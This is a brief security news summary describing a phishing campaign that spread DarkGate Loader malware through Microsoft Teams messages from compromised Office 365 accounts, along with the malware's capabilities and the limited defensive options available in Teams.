A new phishing campaign is using Microsoft Teams messages to distribute the DarkGate Loader malware through malicious attachments. DarkGate emerged in 2018 and is a potent malware with multiple capabilities.
Diving into details
The campaign began in late August when two compromised external Office 365 accounts were found sending phishing messages through Microsoft Teams to various organizations.
- These accounts were used to deceive Microsoft Teams users into downloading a ZIP file named "Changes to the vacation schedule."
- Clicking on this attachment would initiate the download of the ZIP file from a SharePoint URL, which actually contained an LNK file pretending to be a PDF document.
- The campaign includes a malicious VBScript that triggers a series of actions leading to the installation of the DarkGate Loader.
- To avoid detection, the download process employs Windows cURL to retrieve the malware's executable and script files.
Where it started
The August malvertising campaign introduced a new version of the DarkGate malware. It was being spread through malicious ads and search engine poisoning.
- This DarkGate version incorporates techniques such as obfuscation and encryption to evade detection.
- Notably, the DarkGate toolkit can steal user credentials and has been primarily targeting individuals and organizations in Europe.
- Further capabilities of DarkGate include hVNC for remote access, cryptomining, reverse shell, keylogging, clipboard stealing, and information stealing.
The bottom line
The existing security measures in Microsoft Teams, such as Safe Attachments and Safe Links, were unable to identify or prevent this attack. At the moment, the sole method to thwart this type of attack in Microsoft Teams is by permitting chat requests only from particular external domains. However, it's important to note that this approach may have business consequences, as it necessitates IT administrators to whitelist all trusted external domains.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/76d6_shutterstock_1099854977.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/0260_shutterstock_2142450999.jpg)
